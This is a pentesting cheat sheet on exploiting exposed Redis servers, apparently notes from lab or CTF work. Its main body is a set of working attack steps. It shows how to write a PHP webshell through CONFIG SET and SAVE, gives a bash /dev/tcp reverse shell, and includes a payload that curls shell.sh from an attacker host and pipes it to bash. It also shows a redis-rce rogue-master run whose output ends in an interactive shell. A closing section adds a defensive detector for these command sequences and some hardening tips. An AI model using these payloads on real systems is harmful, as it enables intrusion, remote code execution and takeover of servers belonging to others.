# REDIS Exploitation

Redis is a dangerous service when exposed: we can use it to write files, load modules and more, especially when other services are open alongside it.

{% embed url="https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis" %}

This guide has all we need to know.

{% embed url="https://github.com/n0b0dyCN/RedisModules-ExecuteCommand" %}

This GitHub repository contains the source for the module.so we need; just run `make` to build it.

If the Redis service has write access to a directory served by a web server, try writing files there. /var/www/html is a common one.

So the key is to look for places where we have a file upload vulnerability and figure out the paths.

* [ ] Check the blog
* [ ] Enumerate
* [ ] Enumerate dbs
* [ ] Possible exploitable version
* [ ] Try PHP Webshell if webserver is open
* [ ] Try SSH key
* [ ] Try uploading module.so over FTP if possible and work out the path where that exact file lands, so that we can load the module and execute commands

`/var/ftp/anon/<directory-name-if-applies>` is usually where the anonymous root folder is located.

{% embed url="https://app.gitbook.com/s/FXeC5YxTHfutkog2Ggfm/exploitation" %}

### REDIS + LFI

With the Local File Inclusion you can possibly locate the credentials for the Redis service.

#### Possible Locations

* [ ] /etc/redis/redis.conf
* [ ] /usr/local/etc/redis.conf
* [ ] /opt/redis/

Now with credentials we can authenticate using the following command.

```
redis-cli -h <ip>
auth <password>
```

Next we should enumerate the places Redis can write to, again using the Redis configuration. This is done through the local file inclusion by reading:

```
/etc/systemd/system/redis.service
```

Once read, it lists the places Redis can write to. Now we can drop a PHP reverse shell there or make the machine fetch our reverse shell.

```
$ redis-cli -h 192.168.135.166
192.168.135.166:6379> Auth Ready4Redis?
OK
192.168.135.166:6379> config set dir /opt/redis-files
OK
192.168.135.166:6379> config set dbfilename redis.php
OK
192.168.135.166:6379> 
192.168.135.166:6379> set test "<?php system($_GET['cmd']); ?>"
OK
192.168.135.166:6379> save
```

We then browse to it through the LFI and the cmd parameter should work. The rest is up to you.

This other method requires the target to curl a shell.sh file from us.

```
192.168.135.166:6379> config set dbfilename redisss.php
OK
192.168.135.166:6379> set test "<?php system('whoami'); ?>"
OK
192.168.135.166:6379> save
```

So we create a shell.sh file.

```bash
#!/bin/bash

bash -i >& /dev/tcp/192.168.49.135/80 0>&1
```

We host a web server on whatever port we want (22 in the example below). In redis-cli we run the following, then use the local file inclusion to execute the PHP code.

```
192.168.135.166:6379> config set dbfilename redisssss.php
OK
192.168.135.166:6379> set test "<?php system('curl http://192.168.49.135:22/shell.sh | bash'); ?>"
OK
192.168.135.166:6379> save
```

Use the local file inclusion to navigate to the PHP file.

### Redis 4.x / 5.x Exploitation

{% embed url="https://github.com/Ridter/redis-rce" %}

```
$ python3 redis-rce.py -r 192.168.242.176 -p 6379 -L 192.168.49.242 -P 6379 -f /home/kali/BG/redis-rce/redis-rogue-server/RedisModulesSDK/exp/exp.so

[*] Connecting to  192.168.242.176:6379...
[*] Sending SLAVEOF command to server
[+] Accepted connection from 192.168.242.176:6379
[*] Setting filename
[+] Accepted connection from 192.168.242.176:6379
[*] Start listening on 192.168.49.242:6379
[*] Tring to run payload
[+] Accepted connection from 192.168.242.176:46704
[*] Closing rogue server...

[+] What do u want ? [i]nteractive shell or [r]everse shell or [e]xit: i
[+] Interactive shell open , use "exit" to exit...
$ ls
$ whoami
exp_lin.so
exp.so
snap.lxd
systemd-private-e28d10f1b9db42f4847a9d60b88d7429-systemd-logind.service-D0hrMh
systemd-private-e28d10f1b9db42f4847a9d60b88d7429-systemd-resolved.service-kR64tg
systemd-private-e28d10f1b9db42f4847a9d60b88d7429-systemd-timesyncd.service-i0lI9g
vmware-root_708-2998936538
$ nc
Aprudence
```

Pass the exact path to exp.so as in the -f argument above, otherwise it will not work. Then upgrade your shell using socat.
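From the blue-team side, both chains on this page (CONFIG SET dir/dbfilename followed by SAVE, and SLAVEOF to a rogue master followed by MODULE LOAD) are visible in Redis MONITOR output. The Python below is an added example, not code from the page or from the tools linked above; it parses a constructed MONITOR sample and flags those command sequences per client.

```python
import re
from collections import defaultdict

# Redis MONITOR prints one line per command:
#   <unix_ts> [<db> <client_ip:port>] "CMD" "arg1" "arg2" ...
MONITOR_RE = re.compile(r'^(\d+\.\d+) \[(\d+) ([^\]]+)\] (.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Constructed sample: a normal client, a client redirecting the RDB dump into a
# web root and saving, a client using SLAVEOF + MODULE LOAD, and a benign REPLICAOF NO ONE.
SAMPLE_MONITOR = """\
1700000000.100000 [0 10.0.0.5:40000] "GET" "session:abc"
1700000001.200000 [0 192.168.49.135:51234] "AUTH" "(redacted)"
1700000002.300000 [0 192.168.49.135:51234] "config" "set" "dir" "/var/www/html"
1700000003.400000 [0 192.168.49.135:51234] "config" "set" "dbfilename" "redis.php"
1700000004.500000 [0 192.168.49.135:51234] "set" "test" "..."
1700000005.600000 [0 192.168.49.135:51234] "save"
1700000010.000000 [0 192.168.49.135:51300] "SLAVEOF" "192.168.49.242" "6379"
1700000012.000000 [0 192.168.49.135:51300] "MODULE" "LOAD" "/tmp/exp.so"
1700000020.000000 [0 10.0.0.7:40100] "REPLICAOF" "NO" "ONE"
"""

def parse_monitor_line(line):
    m = MONITOR_RE.match(line)
    if not m:
        return None
    ts, _db, client, rest = m.groups()
    args = ARG_RE.findall(rest)
    return {"ts": float(ts), "client": client, "cmd": args[0].upper() if args else "", "args": args[1:]}

def detect_redis_abuse(lines, window=60.0):
    """Return (client, finding, details) tuples; a SAVE within `window` seconds of a
    CONFIG SET dir/dbfilename by the same client is how the RDB file becomes a webshell."""
    findings, pending = [], defaultdict(dict)  # client -> {"dir"/"dbfilename": (ts, value)}
    for raw in lines:
        ev = parse_monitor_line(raw)
        if not ev:
            continue
        c, cmd, args = ev["client"], ev["cmd"], ev["args"]
        if cmd == "CONFIG" and len(args) >= 3 and args[0].upper() == "SET" \
                and args[1].lower() in ("dir", "dbfilename"):
            pending[c][args[1].lower()] = (ev["ts"], args[2])
        elif cmd in ("SAVE", "BGSAVE") and pending[c]:
            recent = {k: v for k, (t, v) in pending[c].items() if ev["ts"] - t <= window}
            if recent:
                findings.append((c, "rdb_redirect_then_save", recent))
        elif cmd in ("SLAVEOF", "REPLICAOF") and args and args[0].upper() != "NO":
            findings.append((c, "replicaof_external", {"master": ":".join(args[:2])}))
        elif cmd == "MODULE" and args and args[0].upper() == "LOAD":
            findings.append((c, "module_load", {"path": args[1] if len(args) > 1 else ""}))
    return findings
```

Feed it `redis-cli MONITOR` output (or a captured copy) instead of the constructed sample; the same patterns can be prevented outright with `rename-command CONFIG ""` and `requirepass` in redis.conf.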
